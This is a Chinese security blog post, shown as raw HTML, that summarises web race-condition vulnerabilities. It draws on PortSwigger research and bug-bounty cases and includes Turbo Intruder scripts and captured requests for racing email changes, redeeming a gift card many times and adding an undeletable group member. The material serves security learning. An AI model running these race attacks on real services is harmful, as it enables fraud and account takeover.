

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="All-in-One—条件竞争漏洞今天在逛medium的时候，发现《Smashing the state machine: the true potential of web race conditions》还是反复被提及，因此打算写一篇文章，结合james-kettle介绍的内容和一些hackerone的案例，来把条件竞争漏洞做一个总结。 条件竞争漏洞当网站在没有足够保护措施的情况下同时处理请求">
<meta property="og:type" content="article">
<meta property="og:title" content="All-in-One—条件竞争漏洞">
<meta property="og:url" content="http://example.com/2024/07/23/race_condition/index.html">
<meta property="og:site_name" content="Ry4nnnn">
<meta property="og:description" content="All-in-One—条件竞争漏洞今天在逛medium的时候，发现《Smashing the state machine: the true potential of web race conditions》还是反复被提及，因此打算写一篇文章，结合james-kettle介绍的内容和一些hackerone的案例，来把条件竞争漏洞做一个总结。 条件竞争漏洞当网站在没有足够保护措施的情况下同时处理请求">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422093942199.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422100352165.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422101347657.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422105504066.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422110442445.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422113706946.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422133954809.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422133802048.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422134542606.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422135034818.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422142231749.png">
<meta property="og:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422145033724.png">
<meta property="article:published_time" content="2024-07-23T04:00:00.000Z">
<meta property="article:modified_time" content="2024-07-23T07:29:25.797Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="vulnerability">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2023/04/27/file-upload/on/image-20240422093942199.png">
  
  
  <title>All-in-One—条件竞争漏洞 - Ry4nnnn</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.13","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"MgDyY5XEdtIKIZHTxzy3GBJV-gzGzoHsz","app_key":"P8Ab9EN1clJmhpYHpamFEiD9","server_url":"https://mgdyy5xe.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Ry4nnnn&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/moon.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="All-in-One—条件竞争漏洞">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2024-07-23 12:00" pubdate>
        2024年7月23日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      53 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">All-in-One—条件竞争漏洞</h1>
            
            <div class="markdown-body">
              <h1 id="All-in-One—条件竞争漏洞"><a href="#All-in-One—条件竞争漏洞" class="headerlink" title="All-in-One—条件竞争漏洞"></a>All-in-One—条件竞争漏洞</h1><p>今天在逛medium的时候，发现《Smashing the state machine: the true potential of web race conditions》还是反复被提及，因此打算写一篇文章，结合james-kettle介绍的内容和一些hackerone的案例，来把条件竞争漏洞做一个总结。</p>
<h2 id="条件竞争漏洞"><a href="#条件竞争漏洞" class="headerlink" title="条件竞争漏洞"></a>条件竞争漏洞</h2><p>当网站在没有足够保护措施的情况下同时处理请求时，就可能会产生条件竞争漏洞，这可能会导致多个不同的线程同时与相同的数据交互，从而导致冲突，出现意想不到的结果。</p>
<p>例如在领取优惠券时，通过条件竞争可能能够领取多张，引用一张portswigger的图如下：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422093942199.png" srcset="/img/loading.gif" lazyload alt="image-20240422093942199"></p>
<h2 id="Smashing-the-state-machine-the-true-potential-of-web-race-conditions（粉碎状态机：条件竞争漏洞的真正潜力）"><a href="#Smashing-the-state-machine-the-true-potential-of-web-race-conditions（粉碎状态机：条件竞争漏洞的真正潜力）" class="headerlink" title="Smashing the state machine: the true potential of web race conditions（粉碎状态机：条件竞争漏洞的真正潜力）"></a>Smashing the state machine: the true potential of web race conditions（粉碎状态机：条件竞争漏洞的真正潜力）</h2><p>说完什么是条件竞争漏洞，接下来简单介绍一下关于这个漏洞最知名的一篇文章《Smashing the state machine: the true potential of web race conditions》，也可以直接去youtube观看相关视频：<a target="_blank" rel="noopener" href="https://youtu.be/tKJzsaB1ZvI">https://youtu.be/tKJzsaB1ZvI</a></p>
<p>“The true potential of race conditions can be summed up in a single sentence. Every pentester knows that multi-step sequences are a hotbed for vulnerabilities, but <em>with race conditions, everything is multi-step</em>.”</p>
<p>文中提到，multi-step是最可能出现漏洞的，而对于条件竞争来说，一切都是multi-step。</p>
<h3 id="条件竞争的真正潜力"><a href="#条件竞争的真正潜力" class="headerlink" title="条件竞争的真正潜力"></a>条件竞争的真正潜力</h3><p>有如下一个场景，用户登录时，需要选择角色，其中包含一系列请求：分配角色，重定向到应用等等，请求包如下：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">POST /<span class="hljs-keyword">login</span>			<span class="hljs-number">302</span> <span class="hljs-built_in">Found</span><br><span class="hljs-keyword">GET</span>	 /<span class="hljs-keyword">role</span>   		<span class="hljs-number">302</span> <span class="hljs-built_in">Found</span><br>POST /<span class="hljs-keyword">role</span> 			<span class="hljs-number">302</span> <span class="hljs-built_in">Found</span><br><span class="hljs-keyword">GET</span>  /application	<span class="hljs-number">200</span> OK<br></code></pre></td></tr></table></figure>

<p>用状态机来表示的话，大致如下：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422100352165.png" srcset="/img/loading.gif" lazyload alt="image-20240422100352165"></p>
<p>这里的目标是要获取更高的权限，首先尝试不选择角色，强制从角色选择的界面直接跳转到&#x2F;application页，失败。</p>
<p>这并非说明此处是安全的，因为作者在第一次尝试时，认为GET &#x2F;role的请求并不会更改应用的状态，而实际上，应用会使用管理员权限来初始化每个会话，然后在浏览器获取角色选择界面之后立即进行覆盖，修改后的状态机如下：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422101347657.png" srcset="/img/loading.gif" lazyload alt="image-20240422101347657"></p>
<p>首先是null，在登录之后，变为admin(初始化会话)，进入角色选择界面，变为pending(待定)，再进行角色选择，最终变成staff(员工).</p>
<p>如果跳过GET &#x2F;role，也就是不去重定向到&#x2F;role界面，直接跳转到应用中，就能获得管理员权限。</p>
<h3 id="Single-packet-attack"><a href="#Single-packet-attack" class="headerlink" title="Single-packet attack"></a>Single-packet attack</h3><p>子状态(sub-state)是一种很短暂的状态，在应用程序处理单个请求时进行转换，并且在请求完成之前退出。子状态一般只会占用很短的时间(1ms)。</p>
<p>要想发现子状态，需要一个初始HTTP请求来触发子状态转换，还需要第二个请求在竞争窗口(race window)期间与同一资源进行交互。</p>
<p>以前面的场景为例，需要发送一个登录请求，和一个访问管理面板的请求，但是由于网络抖动(jitter)，竞争窗口较小的漏洞也很难被发现，因为抖动会导致TCP数据包的到达时间不规律：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422105504066.png" srcset="/img/loading.gif" lazyload alt="image-20240422105504066"></p>
<p>所以作者开发出了single-packet attack，可以使20-30个请求同时到达服务器。</p>
<p>在新版的burp中可以看到该功能：</p>
<p>将多个数据包发到repeater之后，添加到一个group中即可。</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422110442445.png" srcset="/img/loading.gif" lazyload alt="image-20240422110442445"></p>
<h3 id="预测可能的碰撞"><a href="#预测可能的碰撞" class="headerlink" title="预测可能的碰撞"></a>预测可能的碰撞</h3><p>首先要确定想要绕过的对象，比如用户，会话，还是一些特定的业务，比如订单等等。</p>
<p>对于每个对象，要了解其写入数据或者读取数据的点。比如，用户可能将注册，配置文件修改，密码重置等数据存储在数据库表中，网站的登录功能也可能会在创建会话时从用户表中读取关键数据。</p>
<p>条件竞争漏洞需要有“碰撞”——即对共享资源进行两个并发操作。可以通过下面3个问题来排除不太可能受影响的功能点：</p>
<h4 id="状态如何存储"><a href="#状态如何存储" class="headerlink" title="状态如何存储"></a>状态如何存储</h4><p>存储在服务器端数据结构中的数据非常可能被利用。相反，如果完全存储在客户端，例如通过email发送JWT进行密码重置，这些点基本可以跳过。</p>
<h4 id="我们是在编辑还是在追加"><a href="#我们是在编辑还是在追加" class="headerlink" title="我们是在编辑还是在追加"></a>我们是在编辑还是在追加</h4><p>编辑现有数据的操作更可能出现问题，例如更改帐户的电子邮件地址，而简单地添加(append)到现有数据的操作则不太可能被攻击，例如添加额外的电子邮件地址。</p>
<h4 id="这个操作的key是什么"><a href="#这个操作的key是什么" class="headerlink" title="这个操作的key是什么"></a>这个操作的key是什么</h4><p>大多数功能点都是针对特定的key进行操作，这个key可以是用户名，密码重置的令牌，或者是文件名等等。为了成功实施攻击，需要对这个key进行两次操作。</p>
<p>以下面密码重置的场景为例：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422113706946.png" srcset="/img/loading.gif" lazyload alt="image-20240422113706946"></p>
<p>第一个情况下，用户的密码重置令牌存储在数据库的用户表中，key为用户的ID，如果攻击者用两个请求同时触发两个不同ID用户的重置密码请求，那么两个不同的数据库记录会被更改，因此不会有冲突。</p>
<p>在第二个情况下，状态存储在用户session中，并且key为用户的sessionid，如果攻击者使用两个请求同时触发两个密码重置请求，那么两个线程就会尝试更改同一个session的令牌，导致将用户令牌发送给其他用户。</p>
<h3 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h3><h4 id="通过limit-overrun进行对象屏蔽"><a href="#通过limit-overrun进行对象屏蔽" class="headerlink" title="通过limit-overrun进行对象屏蔽"></a>通过limit-overrun进行对象屏蔽</h4><p>这里给出了一个gitlab的对象屏蔽漏洞。gitlab允许通过电子邮件的形式邀请用户去管理项目，用6个请求来进行探测。</p>
<p>请求如下：</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">POST <span class="hljs-string">/api/</span>…<span class="hljs-string">/invitations</span> HTTP/2<br><span class="hljs-string">...</span><br>&#123;<span class="hljs-string">&quot;email&quot;</span>:<span class="hljs-string">&quot;x@psres.net&quot;</span>&#125;<br></code></pre></td></tr></table></figure>

<p>首先按顺序发送这些请求，每个请求之间有一个短暂的延迟。此时收到了6个 {“status”:”success”}和一封邀请的电子邮件。</p>
<p>下面使用single-packet attack发送请求。收到了1个 {“status”:”success”}和5个{“message”:”The member’s email address has already been taken”}，此时电子邮件变成了两封。</p>
<p>响应和电子邮件的差异性表明这里存在一个子状态，进一步挖掘之后发现这里确实存在漏洞。利用条件竞争，能够创建一个虚拟的低特权邀请。</p>
<h4 id="多端点碰撞"><a href="#多端点碰撞" class="headerlink" title="多端点碰撞"></a>多端点碰撞</h4><p>有这样一个购买的场景，可以购买商品，支付费用，并且能够在订单确认页面添加其他商品到购物车里。</p>
<p>这样的流程最终导致能够免费获得额外商品。</p>
<p>购买的场景如下：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422133954809.png" srcset="/img/loading.gif" lazyload alt="image-20240422133954809"></p>
<p>同时发送确认订单和添加商品的请求，最终导致额外商品的零元购。</p>
<p>再说回gitlab的漏洞：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422133802048.png" srcset="/img/loading.gif" lazyload alt="image-20240422133802048"></p>
<p>如图所示，在验证邮件地址的同时改变地址，是不是就能欺骗gitlab，将错误的邮件标记为已验证？</p>
<p>在测试时发现，确认的操作每次都在电子邮件更改之前执行，这说明更改邮件的功能点比确认邮件的功能点进行了更多的处理，因此同步发送这两个请求就会错过race window:</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422134542606.png" srcset="/img/loading.gif" lazyload alt="image-20240422134542606"></p>
<p>这里的解决方案是将确认邮件的请求延迟了90ms。</p>
<p>但是如果存在延迟，就无法使用single-packet attack，这里可以利用常见的安全功能来实现。先发送大量虚拟数据包，触发服务器的速率限制，再通过single-packet attack请求即可。</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422135034818.png" srcset="/img/loading.gif" lazyload alt="image-20240422135034818"></p>
<h4 id="单端点碰撞"><a href="#单端点碰撞" class="headerlink" title="单端点碰撞"></a>单端点碰撞</h4><p>在gitlab中，更改电子邮件的响应时间仅仅为220ms，远快于作者预期，所以猜测电子邮件是由不同的线程发送的。</p>
<p>下面尝试将邮件地址同时更改两个不同的地址：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus">POST /-/profile HTTP/<span class="hljs-number">2</span>Host: gitlab<span class="hljs-selector-class">.com</span><br>user<span class="hljs-selector-attr">[email]</span>=test1@psres<span class="hljs-selector-class">.net</span><br><br>POST /-/profile HTTP/<span class="hljs-number">2</span>Host: gitlab<span class="hljs-selector-class">.com</span><br>user<span class="hljs-selector-attr">[email]</span>=test2@psres.net<br></code></pre></td></tr></table></figure>

<p>邮件内容如下：</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-keyword">To</span>: test2<span class="hljs-symbol">@psres</span>.net<br>Subject: Confirmation instructions<br><br>           test1<span class="hljs-symbol">@psres</span>.net<br><br>Click the link below <span class="hljs-keyword">to</span> confirm your email address.<br><br>        Confirm your email address<br></code></pre></td></tr></table></figure>

<p>收件地址有时候与正文中的地址并不匹配。而且错误的邮件中令牌是有效的。通过提交两个请求，就能够将邮件改为任意地址，并且不需要进行验证。</p>
<h2 id="修改邮件地址"><a href="#修改邮件地址" class="headerlink" title="修改邮件地址"></a>修改邮件地址</h2><p>用户attacker已经注册过，并且验证过电子邮件。而victim email没有注册过。</p>
<p>以attacker用户登录，更改邮件地址，抓包。</p>
<p>选择邮件地址参数，发送到intruder，更改脚本如下：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-keyword">def</span> <span class="hljs-title function_">queueRequests</span>(<span class="hljs-params">target, wordlists</span>):<br><br>    <span class="hljs-comment"># if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack</span><br>    <span class="hljs-comment"># if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead</span><br>    <span class="hljs-comment"># for more information, check out https://portswigger.net/research/smashing-the-state-machine</span><br>    engine = <span class="hljs-title class_">RequestEngine</span>(endpoint=target.endpoint,<br>                        concurrentConnections=<span class="hljs-number">1</span>,<br>                        engine=<span class="hljs-title class_">Engine</span>.<span class="hljs-variable constant_">BURP2</span><br>                        )<br><br>    <span class="hljs-comment"># the &#x27;gate&#x27; argument withholds part of each request until openGate is invoked</span><br>    <span class="hljs-comment"># if you see a negative timestamp, the server responded before the request was complete</span><br>    engine.queue(target.req, <span class="hljs-string">&#x27;victim@example.com&#x27;</span>, gate=<span class="hljs-string">&#x27;race1&#x27;</span>)<br>    engine.queue(target.req, <span class="hljs-string">&#x27;attacker@example.com&#x27;</span>, gate=<span class="hljs-string">&#x27;race1&#x27;</span>)<br><br>    <span class="hljs-comment"># once every &#x27;race1&#x27; tagged request has been queued</span><br>    <span class="hljs-comment"># invoke engine.openGate() to send them in sync</span><br>    engine.openGate(<span class="hljs-string">&#x27;race1&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">handleResponse</span>(<span class="hljs-params">req, interesting</span>):<br>    table.add(req)<br></code></pre></td></tr></table></figure>

<p>发送之后，发现邮件内容中提到的收件人和实际上是不同的：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422142231749.png" srcset="/img/loading.gif" lazyload alt="image-20240422142231749"></p>
<p>成功将email改为victim。</p>
<h2 id="多次兑换礼品卡"><a href="#多次兑换礼品卡" class="headerlink" title="多次兑换礼品卡"></a>多次兑换礼品卡</h2><p>购买礼品卡后兑换，抓包：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/fi/redeem</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>sandbox.reverb.com<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>en-US,en;q=0.5<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>https://sandbox.reverb.com/fi/redeem<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>176<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>keep-alive<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>&lt;cookies&gt;<br><br><span class="language-routeros"><span class="hljs-attribute">utf8</span>=%E2%9C%93&amp;authenticity_token=&lt;CSRF token&gt;&amp;<span class="hljs-attribute">token</span>=&lt;GIFT card&gt;&amp;<span class="hljs-attribute">commit</span>=Redeem+Now</span><br></code></pre></td></tr></table></figure>

<p>发送到intruder，修改脚本如下：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs routeros">def queueRequests(target, wordlists):<br>    engine = RequestEngine(<span class="hljs-attribute">endpoint</span>=target.endpoint,<br>                           <span class="hljs-attribute">concurrentConnections</span>=30,<br>                           <span class="hljs-attribute">requestsPerConnection</span>=30,<br>                           <span class="hljs-attribute">pipeline</span>=<span class="hljs-literal">False</span><br>                           )<br><br>   <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(30):<br>	engine.queue(target.req, i)<br>        engine.queue(target.req, target.baseInput, <span class="hljs-attribute">gate</span>=<span class="hljs-string">&#x27;race1&#x27;</span>)<br><br><br>    engine.start(<span class="hljs-attribute">timeout</span>=5)<br>   engine.openGate(<span class="hljs-string">&#x27;race1&#x27;</span>)<br><br>    engine.complete(<span class="hljs-attribute">timeout</span>=60)<br><br><br>def handleResponse(req, interesting):<br>	table.<span class="hljs-built_in">add</span>(req)<br></code></pre></td></tr></table></figure>

<p>成功兑换多次：</p>
<p><img src="/2023/04/27/file-upload/on/image-20240422145033724.png" srcset="/img/loading.gif" lazyload alt="image-20240422145033724"></p>
<h2 id="添加不可删除的组成员"><a href="#添加不可删除的组成员" class="headerlink" title="添加不可删除的组成员"></a>添加不可删除的组成员</h2><p>有两个用户，分别为leader和normal。</p>
<p>leader账户创建一个group并且创建邀请链接，用normal账户加入group并抓包：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/group/post_join</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>ctf.hacker101.com<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>en-US,en;q=0.5<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>https://ctf.hacker101.com/group/join?invite=bb5c42ab578b12c63e5d868b3e03816c8c45597262aaf095ca2be19116b8fd0a<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>109<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>COOKIES<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><br><span class="language-llvm">csrf<span class="hljs-operator">=</span><span class="hljs-number">391</span>aecf<span class="hljs-number">0</span><span class="hljs-keyword">c</span><span class="hljs-number">3125e90</span><span class="hljs-keyword">c</span><span class="hljs-number">437</span>d<span class="hljs-number">04</span><span class="hljs-keyword">c</span><span class="hljs-number">18204</span>ab<span class="hljs-number">6</span>&amp;invite<span class="hljs-operator">=</span>bb<span class="hljs-number">5</span><span class="hljs-keyword">c</span><span class="hljs-number">42</span>ab<span class="hljs-number">578</span>b<span class="hljs-number">12</span><span class="hljs-keyword">c</span><span class="hljs-number">63e5</span>d<span class="hljs-number">868</span>b<span class="hljs-number">3e03816</span><span class="hljs-keyword">c</span><span class="hljs-number">8</span><span class="hljs-keyword">c</span><span class="hljs-number">45597262</span>aaf<span class="hljs-number">095</span>ca<span class="hljs-number">2</span>be<span class="hljs-number">19116</span>b<span class="hljs-number">8</span>fd<span class="hljs-number">0</span>a</span><br></code></pre></td></tr></table></figure>

<p>并发5次之后，成功将normal账户添加到group中两次，并且无法删除该成员，只能删除组。</p>
<h2 id="TIPS"><a href="#TIPS" class="headerlink" title="TIPS"></a>TIPS</h2><p>如果使用旧版的Turbo Intruder插件，如果遇到HTTP&#x2F;2无法利用的情况，将HTTP&#x2F;2改为HTTP&#x2F;1.1即可。</p>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/research/smashing-the-state-machine">Smashing the state machine: the true potential of web race conditions | PortSwigger Research</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/vulnerability/">vulnerability</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/vulnerability/">vulnerability</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
